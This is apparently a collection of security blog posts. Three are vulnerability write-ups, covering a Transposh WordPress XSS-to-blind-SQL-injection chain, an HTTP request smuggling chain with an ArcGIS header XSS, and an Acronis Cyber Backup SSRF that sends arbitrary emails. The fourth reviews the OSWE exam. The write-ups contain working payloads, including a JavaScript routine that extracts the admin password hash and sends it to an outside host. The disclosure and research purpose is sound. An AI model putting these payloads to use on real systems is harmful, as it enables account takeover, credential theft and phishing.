WordPress Transposh: Exploiting a Blind SQL Injection via XSS

22 July 2022 at 00:00

Introduction

You have probably read about my recent batch of CVEs affecting a WordPress plugin called Transposh Translation Filter, which resulted in more than $30,000 in bounties.

Here’s the story about how you could chain three of these CVEs to go from unauthenticated visitor to admin.

Part 1: CVE-2022-2461 - Weak Default Configuration

So the first issue arises when you add Transposh as a plugin to your WordPress site; it comes with a weak default configuration that allows any user (aka Anonymous) to submit new translation entries using the ajax action tp_translation:

This effectively means that an attacker could already influence the (translated) content on a WordPress site, which is shown to all visitors.
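To illustrate what this default configuration permits, here is a minimal sketch of an anonymous translation submission (Python with the requests library; the target URL is a placeholder, and the parameter names are the same ones used in the PoC form shown in Part 2):

# Minimal sketch: submit a translation entry as an anonymous visitor.
# The target URL is a placeholder; parameter names match the PoC form in Part 2.
import requests

AJAX_URL = "http://wordpress.example/wp-admin/admin-ajax.php"  # placeholder host

data = {
    "action": "tp_translation",          # Transposh's ajax action
    "ln0": "en",
    "sr0": "0",
    "items": "1",
    "tk0": "Hello world",                # original string
    "tr0": "attacker-controlled text",   # the submitted "translation"
}

response = requests.post(AJAX_URL, data=data)
print(response.status_code, response.text)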

Part 2: CVE-2021-24911 - Unauthenticated Stored Cross-Site Scripting

The same ajax action tp_translation can also be used to permanently place arbitrary JavaScript into the Transposh admin backend using the following payload:

<html>
  <body>
    <form action="http://[host]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tp&#95;translation" />
      <input type="hidden" name="ln0" value="en" />
      <input type="hidden" name="sr0" value="0" />
      <input type="hidden" name="items" value="1" />
      <input type="hidden" name="tk0" value="xss&lt;script&gt;alert&#40;1337&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="tr0" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

When an administrator then visits either Transposh’s main dashboard page at /wp-admin/admin.php?page=tp_main or the Translation editor tab at /wp-admin/admin.php?page=tp_editor, the injected JavaScript executes:

At this point, you can already do a lot of stuff on the backend, but let’s escalate it further by exploiting a seemingly less severe authenticated SQL Injection.

Part 3: CVE-2022-25811 - Authenticated SQL Injections

So this is probably the most exciting part, although the SQL Injections alone only have a CVSS score of 6.8 because they are only exploitable using administrative permissions. Overall, we’re dealing with a blind SQL Injection here, which can be triggered using a simple sleep payload:

/wp-admin/admin.php?page=tp_editor&orderby=lang&orderby=lang&order=asc,(SELECT%20(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(10)%20ELSE%202%20END))

This results in a nice delay of the response proving the SQL Injection:
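If you want a second data point besides eyeballing the delay, you can simply time the request against a non-sleeping baseline. A rough sketch (Python requests; host and session cookie are placeholders, since the injection requires administrative permissions):

# Rough sketch: compare response times with and without the SLEEP(10) branch firing.
# Host and session cookie are placeholders; an administrator session is required.
import time
import requests

BASE = "http://wordpress.example/wp-admin/admin.php"
COOKIES = {"wordpress_logged_in_xyz": "admin-session-cookie"}  # placeholder

def timed(condition):
    order = "asc,(SELECT (CASE WHEN ({}) THEN SLEEP(10) ELSE 2 END))".format(condition)
    params = [("page", "tp_editor"), ("orderby", "lang"), ("orderby", "lang"), ("order", order)]
    start = time.time()
    requests.get(BASE, params=params, cookies=COOKIES, timeout=30)
    return time.time() - start

print("1=1 (sleep):    %.1fs" % timed("1=1"))
print("1=2 (no sleep): %.1fs" % timed("1=2"))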

To fully escalate this chain, let’s get to the most interesting part.

How to (Quickly) Exploit a Blind SQL Injection via Cross-Site Scripting

Approach

Have you ever thought about how to exploit a blind SQL Injection via JavaScript? You might have read my previous blog article, where I used a similar bug chain, but with an error-based SQL Injection. That one only required a single injection payload to exfiltrate the admin user’s password, which is trivially easy. However, to exploit a blind SQL Injection, you typically need hundreds, probably thousands of boolean (or time-based) comparisons to exfiltrate data. The goal here is the same: extracting the administrator’s password from the database.

Now, you might think: well, you could use a boolean comparison and iterate over each character of the password. However, since those hashed passwords (WordPress uses the phpass algorithm to hash passwords) are typically 30 characters long (excluding the first four static bytes $P$B) and consist of alphanumeric characters plus a few special chars (i.e. $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/), going through all the possible ASCII characters from 46 (".") to 122 (lowercase "z") would require around 76 requests per character, which could result in 76*30 = 2280 requests.

This is a lot and will require the victim to stay on the page for quite a while.

So let’s do it a bit smarter with only around 320 requests, which is roughly 86% fewer. Yes, you might still find more optimization potential in my following approach, but I find that to be enough here.

Transposh’s Sanitization?!

While doing the source code review to complete this chain, I stumbled upon a mostly useless attempt to filter special characters in the vulnerable orderby and order parameters. It looks like they decided to rely solely on FILTER_SANITIZE_SPECIAL_CHARS, which merely HTML-encodes '"<>& and characters below ASCII 32:

$orderby = (!empty(filter_input(INPUT_GET, 'orderby', FILTER_SANITIZE_SPECIAL_CHARS)) ) ? filter_input(INPUT_GET, 'orderby', FILTER_SANITIZE_SPECIAL_CHARS) : 'timestamp';
$order = (!empty(filter_input(INPUT_GET, 'order', FILTER_SANITIZE_SPECIAL_CHARS)) ) ? filter_input(INPUT_GET, 'order', FILTER_SANITIZE_SPECIAL_CHARS) : 'desc';

It’s still a limitation, but easy to work around: we’re just going to replace the forbidden comparison characters < and > with a BETWEEN x AND y clause. We don’t actually care about " and & since the payload doesn’t require them.

Preparing The Test Cases

The SQL Injection payload that can be used looks like the following (thanks to sqlmap for the initial payload!):

(SELECT+(
  CASE+WHEN+(
    ORD(MID((SELECT+IFNULL(CAST(user_pass+AS+NCHAR),0x20)+FROM+wordpress.wp_users+WHERE+id%3d1+ORDER+BY+user_pass+LIMIT+0,1),1,1))
    +BETWEEN+1+AND+122)+
    THEN+1+ELSE+2*(SELECT+2+FROM+wordpress.wp_users)+END))

I’ve split the payload up for readability reasons here. Let me explain its core components:

  • The ORD() (together with MID()) walks, character by character, through the user_pass string returned by the subquery. This means we’ll get the password char by char. I’ve also added a WHERE id=1 clause to ensure we’re only grabbing the password of WordPress’s user id 1, which is usually the administrator of the instance.
  • The CASE WHEN –> BETWEEN 1 AND 122 part checks whether the ordinal value of the currently probed character lies between 1 and 122.
  • The THEN –> ELSE part makes the difference in the overall output and is the data point we will rely on when exploiting this with a Boolean-based approach.

The False Case

Let’s see how we can differentiate the responses to the BETWEEN x AND y part. We already know that the first character of a WordPress password hash is $ (ASCII 36), so let’s use it to show how the application reacts.

The payload /wp-admin/admin.php?page=tp_editor&orderby=lang&orderby=lang&order=asc,(SELECT+(CASE+WHEN+(ORD(MID((SELECT+IFNULL(CAST(user_pass+AS+NCHAR),0x20)+FROM+wordpress.wp_users+WHERE+id%3d1+ORDER+BY+user_pass+LIMIT+0,1),1,1))+BETWEEN+100+AND+122)+THEN+1+ELSE+2*(SELECT+2+FROM+wordpress.wp_users)+END)) performs a BETWEEN 100 and 122 test which results in the following visible output:

The True Case

The payload /wp-admin/admin.php?page=tp_editor&orderby=lang&orderby=lang&order=asc,(SELECT+(CASE+WHEN+(ORD(MID((SELECT+IFNULL(CAST(user_pass+AS+NCHAR),0x20)+FROM+wordpress.wp_users+WHERE+id%3d1+ORDER+BY+user_pass+LIMIT+0,1),1,1))+BETWEEN+1+AND+122)+THEN+1+ELSE+2*(SELECT+2+FROM+wordpress.wp_users)+END)) in return performs a BETWEEN 1 and 122 check and returns a different visible output:

As you can see on the last screenshot, in the true case, the application will show the Bulk actions dropdown alongside the translated strings. This string will be our differentiator!

How to Reduce the Exploitation Requests from ~2200 to ~300

So we need a way to avoid sending 76 requests per character across the range from 46 (.) to 122 (lowercase z). Let’s do it by approximation, essentially a binary search: take the range 46-122 and apply some math.

Let’s first define a couple of things:

  • 46: the lowest end of the possible character set –> cur (current) value.
  • 122: the upper end of the possible character set –> max (maximum) value.
  • 0: the previously valid current value –> prev value. We need to keep track of the last true-case value so we can fall back to it whenever we hit a false case. It starts at 0 because we don’t know the first valid value yet.

Doing the initial BETWEEN check of cur and max will always result in a true case (because it covers the entire allowed character set). To narrow it down, we now move cur to the middle between cur and max using the formula:

cur = cur + (Math.floor((max-cur)/2));

This results in a check of BETWEEN 84 AND 122, i.e. we’re testing whether the target is located in the upper half of the range (and implicitly, if not, in the lower half). If this again results in a true case because the probed character is in that range, we repeat the same calculation and keep narrowing it down towards the correct character.

However, if we encounter a false case because the character is lower than 84, we set max to the current cur value (since we now have to look into the lower half) and reset cur to the prev value.

Based on this theory, matching the uppercase character C (ASCII 67) produces the following sequence of true cases (the false cases in between are not logged):

true: cur:84, prev:46,max:122
true: cur:65, prev:46,max:84
true: cur:74, prev:65,max:84
true: cur:69, prev:65,max:74
true: cur:67, prev:65,max:69
true: cur:68, prev:67,max:69
true: cur:67, prev:67,max:68

Finally, once cur equals prev, we’ve found the correct char. Counting the unlogged false cases as well, that’s 11 requests instead of the 21 (67-46) a linear scan starting at 46 would need.
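The narrowing logic is easy to sanity-check offline. The following sketch reproduces the calculation described above (plain Python, no HTTP involved) and prints the same true-case trace for C while also counting the false cases:

# Offline simulation of the narrowing logic described above (no HTTP involved).
def find_char(target_ord, cur=46, max_=122):
    prev = 0
    requests_needed = 0
    while True:
        requests_needed += 1
        if cur <= target_ord <= max_:            # "true" case: BETWEEN cur AND max matched
            prev = cur
            cur = cur + (max_ - cur) // 2
            print(f"true: cur:{cur}, prev:{prev}, max:{max_}")
            if cur == prev:                      # narrowed down to a single value
                return cur, requests_needed
        else:                                    # "false" case: retry in the lower half
            max_ = cur
            cur = prev

print(find_char(ord("C")))                       # -> (67, 11): 7 true cases plus 4 false ones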

Some JavaScript (Magic)

Honestly, I’m not a JavaScript pro, and there might be ways to optimize it, but here’s my implementation, which should work with any blind SQL Injection that you want to chain with an XSS against WordPress:

async function exploit() {
    let result = "$P$B";     // the first four bytes of a WordPress phpass hash are static
    let targetChar = 5;      // so start extracting at character 5
    let prev = 0;
    let cur = 46;            // lower end of the character set (".")
    let max = 122;           // upper end of the character set ("z")
    let requestCount = 0;

    do {
        let url = `/wp-admin/admin.php?page=tp_editor&orderby=lang&orderby=lang&order=asc,(SELECT+(CASE+WHEN+(ORD(MID((SELECT+IFNULL(CAST(user_pass+AS+NCHAR),0x20)+FROM+wordpress.wp_users+WHERE+id%3d1+ORDER+BY+user_pass+LIMIT+0,1),${targetChar},1))+BETWEEN+${cur}+AND+${max})+THEN+1+ELSE+2*(SELECT+2+FROM+wordpress.wp_users)+END))`

        const response = await fetch(url)
        const data = await response.text()

        requestCount = requestCount + 1;

        // this is the true/false differentiator
        if(data.includes("Bulk actions"))
        {
            // "true" case
            prev = cur;
            cur = cur + (Math.floor((max-cur)/2));

            //console.log('true: cur:' + cur + ', prev:' + prev + ',max:' + max );

            // past the end of the hash, ORD(MID(...)) returns 0, so the search
            // converges to cur = prev = 0 and we're done
            if(cur === 0 && prev === 0) {
                console.log('Request count: ' + requestCount);
                return(result)
            }

            // this means we've found the correct char
            if(cur === prev) {
                result = result + String.fromCharCode(cur);

                // reset initial values
                prev = 0;
                cur = 20;
                max = 122;

                // proceed with next char
                targetChar = targetChar + 1;

                console.log(result);
            }
        }
        else
        {
            // "false" case
            // console.log('false: cur:' + cur + ', prev:' + prev + ',max:' + max );

            max = cur;
            cur = prev;
        }
    } while (1)
}



exploit().then(x => {
    console.log('password: ' + x);

    // let's leak it to somewhere else
    let leakUrl = "http://www.rcesecurity.com?password=" + x;
    let xhr = new XMLHttpRequest();
    xhr.open('GET', leakUrl);
    xhr.send();
});

Connecting the Dots

Now you could inject a Stored XSS payload like the following, which points a script src to a JavaScript file containing the payload:

<html>
  <body>
    <form action="http://[host]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tp&#95;translation" />
      <input type="hidden" name="ln0" value="en" />
      <input type="hidden" name="sr0" value="xss" />
      <input type="hidden" name="items" value="3" />
      <input type="hidden" name="tk0" value="xss&lt;script&#32;src&#61;&quot;https&#58;&#47;&#47;www&#46;attacker&#46;wf&#47;ff&#46;js&quot;&gt;" />
      <input type="hidden" name="tr0" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Trick an admin into visiting the Transposh backend, and finally enjoy your WordPress hash:

AWAE Course and OSWE Exam Review

22 April 2022 at 00:00

Introduction

This is a review of the Advanced Web Attacks and Exploitation (WEB-300) course and its OSWE exam by Offensive-Security. I’ve taken this course because I was curious about what secret tricks this course will offer for its money, especially considering that I’ve done a lot of source code reviews in different languages already.

This course is designed to develop, or expand, your exploitation skills in web application penetration testing and exploitation research. This is not an entry level course–it is expected that you are familiar with basic web technologies and scripting languages. We will dive into, read, understand, and write code in several languages, including but not limited to JavaScript, PHP, Java, and C#.

I got this course as part of my Offensive-Security Learn Unlimited subscription, which includes all of their courses (except for the EXP-401) and unlimited exam attempts. Luckily, I only needed one attempt to pass the exam and get my OSWE certification.

The Courseware & the Labs

I’d say it’s a typical Offensive-Security course. It comes with hundreds of written pages and hours of video content explaining every vulnerability class in such incredible detail, which is fantastic if you’re new to certain things. But the courseware still assumes a technically competent reader proficient with programming concepts such as object orientation, so I don’t recommend taking this course without prior programming knowledge.

You will also get access to their labs to follow the course materials. These labs consist of Linux and Windows machines that you will pwn along the course, and they are fun! You will touch on all the big vulnerability classes and some lesser-known ones that you usually don’t encounter in your day-to-day BugBounty business. Some of these are:

  • Authentication Bypasses of all kinds
  • Type Juggling
  • SQL Injection
  • Server-Side JavaScript Injection
  • Deserialization
  • Template Injection
  • Cross-Site Scripting (this was unexpected in an RCE context!)
  • Server-Side Request Forgery
  • Prototype Pollution
  • Classic command injection

It took me roughly a week to get through all videos and labs, mostly because I was already familiar with most of the vulnerability classes and content. My most challenging ones were the type juggling (this is some awesome stuff!) and prototype pollution. I also decided not to do the extra mile exercises; however, I’d still recommend them to everyone who is relatively new to source code review and exploitation and wants to practice their skills.

The Exam

Overview

The exam is heavily time-constrained. You have 47 hours and 45 minutes to work through the two target machines, where you have full access to the application’s source code. But be prepared that the source code to review might be a lot - good time management is crucial here. After the pure hacking time, you will have another 24 hours to submit your exam documentation.

The Proctoring

But before actually being able to read a lot of source code, you have to go through the proctoring setup with the proctors themselves. You have to be 15 minutes early to the party to show your government ID, walk them through your room and make sure that they can correctly monitor (all of) your screens. You are also not allowed to have any additional computers or mobile phones in the same room.

The proctoring itself wasn’t a real problem. The proctors have always been friendly and responsive. Note that if you intend to leave the room (even to visit your toilet), you have to let them know when you leave and when you return to your desk. But you do not have to wait for their confirmation - so no toilet incidents are expected ;-) If you intend to stay away for a more extended period (sleep ftw.), they will pause the VPN connection.

Basic Machine Setup

After finishing the proctoring setup at around 12:00, the real fun started. Offensive-Security recommends using their provided Kali VMs, but I decided to go with my native macOS instead. Be aware that if you’d choose to go this way, Offensive-Security does not provide you with any technical support (other than VPN issues). I’ve used the following software for the exam:

  • macOS Monterey 12.3.1
  • Viscosity for the VPN connection
  • Microsoft Remote Desktop to connect to the exam machines
  • Notion as my cheatsheet (Yes, you are allowed to use any notes during the exam)
  • BurpSuite Community for all the hacking (You are not allowed to use the Pro version!)
  • Python for all my scripting works

The exam machines come in a group of two, which means you’ll get one development machine to which you’ll have full access and one “production” machine which you don’t have complete access. You’ll have to do all your research and write your exploit chain on the development machine and afterward perform your exploit against the production machine, which holds the required flags.

The development machines have a basic setup of everything you need to start your journey. You don’t need any additional tools (auto-exploitation tools such as sqlmap are forbidden anyways). Another thing: you are not allowed to remotely mount or copy any of the application’s source code to your local machine to use other tools such as the JetBrains suite to start debugging. You have to do this with the tools provided - so make sure that you’ve read the course materials carefully for your debugging setup and you’re familiar with the used IDEs.

Exam Goal

The goal of the exam is to pwn the two independent production machines using a single script - choose whatever scripting language you’re comfortable with. This means your script should be able to do all the exploitation steps in just one run, from zero to hero. If your script fails to auto-exploit the machine, it counts as a fail (you might still get some partial points, but it might not be enough in the end). Per machine, you have to submit two flags: one for the authentication bypass (35 points) and one for the RCE (15 points). You need to have at least 85 out of 100 points to pass the exam point-wise.

Pwn #1

Once I was familiar with the remote environment, I started to look at target machine #1. It took me roughly 4 hours to identify all the necessary vulnerabilities to get to the RCE. Next up: Automation. I started to write my Python script to auto-exploit both issues, but it took much longer than expected. Why? I struggled with the reliability of my script, which, for some reason, only worked on every second run. After 2.5 hours of optimizations, I finally got my script working with a 10/10 success rate.

I’ve submitted all the flags, ultimately getting me the first 50 points. At that point, I also started to collect screenshots for the documentation part of the exam.

After I got everything, I went to sleep for about 10 hours (that’s important for me to keep a clear mind), and already having half of the required points got me a calm night.

Pwn #2

After I had breakfast on the second day, I started to look at machine #2, which was a bit harder than the first one. It took me roughly half an hour to spot vulnerability #2 (the RCE part), but I still had to find the authentication bypass. Unfortunately, that also took longer than expected because I followed a rabbit hole for about two hours until I noticed that it wasn’t exploitable. But still, after around 6 hours of hacking, I was able to identify the entire bug chain and exploit it. I’ve submitted both flags, getting me an overall 100 out of 100 points - this was my happy moment!

I wrote the Python exploit for auto-exploitation relatively quickly this time since it was structurally entirely different from machine #1. I also started to collect all the screenshots for my documentation. I went to sleep for another 10 hours.

Documentation

On the last day, my exam was about to end at 11:45, and I started early at 08:00 to be able to double-check my scripts, my screenshots, etc. I improved my Python scripts and added some leet hacker output to them without breaking them (yay!). I finished that part at around 10:00 and had almost 2 hours left in the exam lab. So I started to do my documentation right away and noticed (somewhat last minute) that I was missing two screenshots, and trust me, they are so important!

I informed the proctor to end my exam, and I then had another 24 hours to submit my documentation. The entire documentation took me roughly 8 hours to complete - I’m a perfectionist, and this part always takes me the most time to finish. I sent in the documentation on the same day and completed my exam.

A couple of days later, I received the awaited happy mail from Offensive-Security saying that I’ve passed the exam.


Who Should Take This Course?

The course itself is excellent in its content, presentation, and lab-quality. I haven’t seen any comparable course out there, and while many people are claiming that you can get all of it cheaper using Udemy courses, they are only partially correct. Yes, you’ll find a lot of courses about discovering and exploiting vulnerabilities in black box scenarios, but the AWAE targets a different audience. It is mostly about teaching you the source code’ish way of finding vulnerabilities. Where else do you have the chance to learn how to discover and exploit a Type Juggling Issue? It is barely possible without access to the source code. Active exploitation is a minor part of this course and is done manually without automation tools.

So if you do have programming skills already and are interested in strengthening your vulnerability discovery skills on source code review engagements, then this course might be the one for you. I have 5+ years of experience in auditing, primarily PHP and Java applications, and found this course to be challenging in many (but not all) chapters. However, this course still helped me sharpen my view on how small coding errors can result in impactful bugs by just leaving out a single equal sign.

But suppose you’ve never touched the initially mentioned bug classes, and you have also never touched on different programming languages and concepts such as object orientation. In that case, you should spend some time on practical programming first before buying this course.


Smuggling an (Un)exploitable XSS

13 November 2020 at 00:00


This is the story about how I chained a seemingly uninteresting request smuggling vulnerability with an even more uninteresting header-based XSS to redirect network-internal website users to arbitrary pages without any user interaction. This post also introduces a 0day in ArcGIS Enterprise Server.

However, this post is not about how request smuggling works. If you’re new to this topic, have a look at the amazing research published by James Kettle, who goes into detail about the concepts.

Smuggling Requests for Different Response Lengths

So what I usually do when looking at a single application is to identify endpoints that are likely to be proxied across the infrastructure. API endpoints are a common example, since they are usually infrastructurally separated from any front-end stuff. While hunting on a private HackerOne program, I found an asset exposing an API endpoint that was vulnerable to a CL.TE-based request smuggling using a payload like the following:

POST /redacted HTTP/1.1
Content-Type: application/json
Content-Length: 132
Host: redacted.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Foo: bar

Transfer-Encoding: chunked

4d
{"GeraetInfoId":"61e358b9-a2e8-4662-ab5f-56234a19a1b8","AppVersion":"2.2.40"}
0

GET / HTTP/1.1
Host: redacted.com
X: X

As you can see here, I’m smuggling a simple GET request against the root path of the webserver on the same vhost. So in theory, if the request is successfully smuggled, we’d see the root page as a response instead of the originally queried API endpoint.
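One detail worth noting when adapting the payload: the chunk-size line ("4d") has to be the hexadecimal length of the chunk body, otherwise the chunked body is misparsed. A quick way to check (plain Python):

# The chunk-size line of the smuggled request must be the hex length of the chunk body.
body = '{"GeraetInfoId":"61e358b9-a2e8-4662-ab5f-56234a19a1b8","AppVersion":"2.2.40"}'
print(len(body), hex(len(body)))   # 77 0x4d -> matches the "4d" line in the request above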

To verify that, I spun up a Turbo Intruder instance with a configuration that issues the payload a hundred times (roughly along the lines of the sketch below).
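A Turbo Intruder script along the lines of its bundled examples would roughly look like this; it runs inside Burp's Turbo Intruder extension, and the connection tuning values are assumptions:

# Rough sketch of a Turbo Intruder script that replays the smuggling request 100 times.
# Based on Turbo Intruder's bundled example scripts; tuning values are assumptions.
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           requestsPerConnection=100,
                           pipeline=False)
    for _ in range(100):
        engine.queue(target.req)    # target.req is the CL.TE request shown above

def handleResponse(req, interesting):
    table.add(req)                  # sort the results table by response length afterwards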

While Turbo Intruder was running, I manually refreshed the page a couple of times to simulate a victim triggering the vulnerability. Interestingly, the attack seemed to work quite well, since there were actually two different response sizes, of which one returned the original response of the API:

And the other returned the start page:

This confirms the request smuggling vulnerability against myself. Pretty cool so far, but self-exploitation isn’t that much fun.

Poisoning Links Through ArcGIS’ X-Forwarded-Url-Base Header

To extend my attack surface for the smuggling issue, I noticed that the same server was also running an instance of ArcGIS Enterprise Server under another directory. So I reviewed its source code for vulnerabilities that I could chain with the request smuggling. I stumbled upon an interesting constellation affecting its generic error handling:

The ArcGIS error handler accepts a custom HTTP header called X-Forwarded-Url-Base that is used as the base of all links on the error page, but only if it is combined with another custom HTTP header called X-Forwarded-Request-Context. The value supplied to X-Forwarded-Request-Context doesn’t really matter as long as it is set.

So a minified request to exploit this issue against ArcGIS’ /rest/directories route looks like the following:

GET /rest/directories HTTP/1.1
Host: redacted.com
X-Forwarded-Url-Base: https://www.rce.wf/cat.html?
X-Forwarded-Request-Context: HackerOne

This simply poisons all links on the error page with a reference to my server at https://www.rce.wf/cat.html? (note the appended ?, which is used to get rid of the automatically appended URL string /rest/services):

While this already looks like a good candidate to be chained with the smuggling, it still requires user interaction: the victim has to click on one of the links on the error page.

However, I was actually looking for something that does not require any user interaction.

A Seemingly Unexploitable ArcGIS XSS

You’ve probably guessed it already. The very same header combination as previously shown is also vulnerable to a reflected XSS. Using a payload like the following for the X-Forwarded-Url-Base:

X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>alert(1)</script>
X-Forwarded-Request-Context: HackerOne

leads to an alert being injected into the error page:

Now, a header-based XSS is usually not exploitable on its own, but it becomes easily exploitable when chained with a request smuggling vulnerability because the attacker is able to fully control the request.

While popping alert boxes on victims that are visiting the vulnerable server is funny, I was looking for a way to maximize my impact to claim a critical bounty. The solution: redirection.

If you’d now use a payload like the following:

X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>document.location='https://www.rce.wf/cat.html';</script>
X-Forwarded-Request-Context: HackerOne

…you’d now be able to redirect users.

Connecting the Dots

The full exploit looked like the following:

POST /redacted HTTP/1.1
Content-Type: application/json
Content-Length: 278
Host: redacted.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Foo: bar

Transfer-Encoding: chunked

4d
{"GeraetInfoId":"61e358b9-a2e8-4662-ab5f-56234a19a1b8","AppVersion":"2.2.40"}
0

GET /redacted/rest/directories HTTP/1.1
Host: redacted.com
X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>document.location='https://www.rce.wf/cat.html';</script>
X-Forwarded-Request-Context: HackerOne
X: X

While executing this attack at around 1000 requests per second, I was able to actually see some interesting hits on my server:

After doing some lookups I was able to confirm that those hits were indeed originating from the program’s internal network.

Mission Completed. Thanks for the nice critical bounty :-)

CVE-2020-16171: Exploiting Acronis Cyber Backup for Fun and Emails

14 September 2020 at 00:00


You have probably read one or more blog posts about SSRFs, many being escalated to RCE. While this might be the ultimate goal, this post is about an often overlooked impact of SSRFs: application logic impact.

This post will tell you the story about an unauthenticated SSRF affecting Acronis Cyber Backup up to v12.5 Build 16341, which allows sending fully customizable emails to any recipient by abusing a web service that is bound to localhost. The fun thing about this issue is that the emails can be sent as backup indicators, including fully customizable attachments. Imagine sending Acronis “Backup Failed” emails to the whole organization with a nice backdoor attached to it? Here you go.

Root Cause Analysis

So Acronis Cyber Backup is essentially a backup solution that offers administrators a powerful way to automatically back up connected systems such as clients and even servers. The solution itself consists of dozens of internally connected (web) services and functionalities, so it’s a mess of different C/C++, Go, and Python applications and libraries.

The application’s main web service runs on port 9877 and presents you with a login screen:

Now, every hacker’s goal is to find something unauthenticated. Something cool. So I’ve started to dig into the source code of the main web service to find something cool. Actually, it didn’t take me too long to discover that something in a method called make_request_to_ams:

# WebServer/wcs/web/temp_ams_proxy.py:

def make_request_to_ams(resource, method, data=None):
    port = config.CONFIG.get('default_ams_port', '9892')
    uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)
[...]

The main interesting thing here is the call to get_ams_address(request.headers), which is used to construct a URI. The application reads out a specific request header called Shard within that method:

def get_ams_address(headers):
    if 'Shard' in headers:
        logging.debug('Get_ams_address address from shard ams_host=%s', headers.get('Shard'))
        return headers.get('Shard')  # Mobile agent >= ABC5.0

When having a further look at the make_request_to_ams call, things are getting pretty clear. The application uses the value from the Shard header in a urllib.request.urlopen call:

def make_request_to_ams(resource, method, data=None):
[...]
    logging.debug('Making request to AMS %s %s', method, uri)
    headers = dict(request.headers)
    del headers['Content-Length']
    if not data is None:
        headers['Content-Type'] = 'application/json'
    req = urllib.request.Request(uri,
                                 headers=headers,
                                 method=method,
                                 data=data)
    resp = None
    try:
        resp = urllib.request.urlopen(req, timeout=wcs.web.session.DEFAULT_REQUEST_TIMEOUT)
    except Exception as e:
        logging.error('Cannot access ams {} {}, error: {}'.format(method, resource, e))
    return resp

So this is a pretty straightforward SSRF, with a couple of bonus points that make it even more powerful:

  • The instantiation of the urllib.request.Request class uses all original request headers, the HTTP method from the request, and even the whole request body.
  • The response is fully returned!

The only thing that needs to be bypassed is the hardcoded construction of the destination URI, since the code appends a colon, a port, and a resource to the requested host:

uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)

However, this is also trivially easy to bypass since you only need to append a ?, which turns everything appended afterwards into a query string. A final payload for the Shard header therefore looks like the following:

Shard: localhost?
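To see why the trailing ? is enough, here is the server-side format string evaluated with a benign and a malicious Shard value (plain Python; the port is the default_ams_port from the config shown above, the resource value is an assumption for illustration):

# Reproduces the URI construction from make_request_to_ams with different Shard values.
port = "9892"                     # default_ams_port from the config shown above
resource = "/api/ams/agents"      # assumed resource value, for illustration only

for shard in ("localhost", "localhost?", "localhost:30572/external_email?"):
    print('http://{}:{}{}'.format(shard, port, resource))

# http://localhost:9892/api/ams/agents
# http://localhost?:9892/api/ams/agents                        <- ":9892/api/ams/agents" becomes a query string
# http://localhost:30572/external_email?:9892/api/ams/agents   <- request hits the notification service instead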

Finding Unauthenticated Routes

To exploit this SSRF, we need to find a route that is reachable without authentication. While most of Cyber Backup’s routes are only reachable with authentication, there is one interesting route called /api/ams/agents which is kinda different:

# WebServer/wcs/web/temp_ams_proxy.py:
_AMS_ADD_DEVICES_ROUTES = [
    (['POST'], '/api/ams/agents'),
] + AMS_PUBLIC_ROUTES

Every request to this route is passed to the route_add_devices_request_to_ams method:

def setup_ams_routes(app):
[...]
    for methods, uri, *dummy in _AMS_ADD_DEVICES_ROUTES:
        app.add_url_rule(uri,
                         methods=methods,
                         view_func=_route_add_devices_request_to_ams)
[...]

This in turn only checks whether the allow_add_devices configuration option is enabled (which it is by default) before passing the request to the vulnerable _route_the_request_to_ams method:

               
def _route_add_devices_request_to_ams(*dummy_args, **dummy_kwargs):
    if not config.CONFIG.get('allow_add_devices', True):
        raise exceptions.operation_forbidden_error('Add devices')

    return _route_the_request_to_ams(*dummy_args, **dummy_kwargs)

So we’ve found our attackable route without authentication here.

Sending Fully Customized Emails Including An Attachment

Apart from doing metadata stuff or similar, I wanted to fire the SSRF directly against one of Cyber Backup’s internal web services. There are many of these, and a whole bunch of them have an authorization concept that relies solely on being callable from localhost. Sounds like a weak spot, right?

One interesting internal web service is listening on localhost port 30572: the Notification Service. This service offers a variety of functionality to send out notifications. One of the provided endpoints is /external_email/:

@route(r'^/external_email/?')
class ExternalEmailHandler(RESTHandler):
    @schematic_request(input=ExternalEmailValidator(), deserialize=True)
    async def post(self):
        try:
            error = await send_external_email(
                self.json['tenantId'], self.json['eventLevel'], self.json['template'], self.json['parameters'],
                self.json.get('images', {}), self.json.get('attachments', {}), self.json.get('mainRecipients', []),
                self.json.get('additionalRecipients', [])
            )
            if error:
                raise HTTPError(http.BAD_REQUEST, reason=error.replace('\n', ''))
        except RuntimeError as e:
            raise HTTPError(http.BAD_REQUEST, reason=str(e))

I’m not going through the send_external_email method in detail since it is rather complex, but this endpoint essentially uses parameters supplied via HTTP POST to construct an email that is sent out afterwards.

The final working exploit looks like the following:

POST /api/ams/agents HTTP/1.1
Host: 10.211.55.10:9877
Shard: localhost:30572/external_email?
Connection: close
Content-Length: 719
Content-Type: application/json;charset=UTF-8

{"tenantId":"00000000-0000-0000-0000-000000000000",
"template":"true_image_backup",
"parameters":{
"what_to_backup":"what_to_backup",
"duration":2,
"timezone":1,
"start_time":1,
"finish_time":1,
"backup_size":1,
"quota_servers":1,
"usage_vms":1,
"quota_vms":1,"subject_status":"subject_status",
"machine_name":"machine_name",
"plan_name":"plan_name",
"subject_hierarchy_name":"subject_hierarchy_name",
"subject_login":"subject_login",
"ams_machine_name":"ams_machine_name",
"machine_name":"machine_name",
"status":"status","support_url":"support_url"
},
"images":{"test":"./critical-alert.png"},
"attachments":{"test.html":"PHU+U29tZSBtb3JlIGZ1biBoZXJlPC91Pg=="},
"mainRecipients":["[email protected]"]}

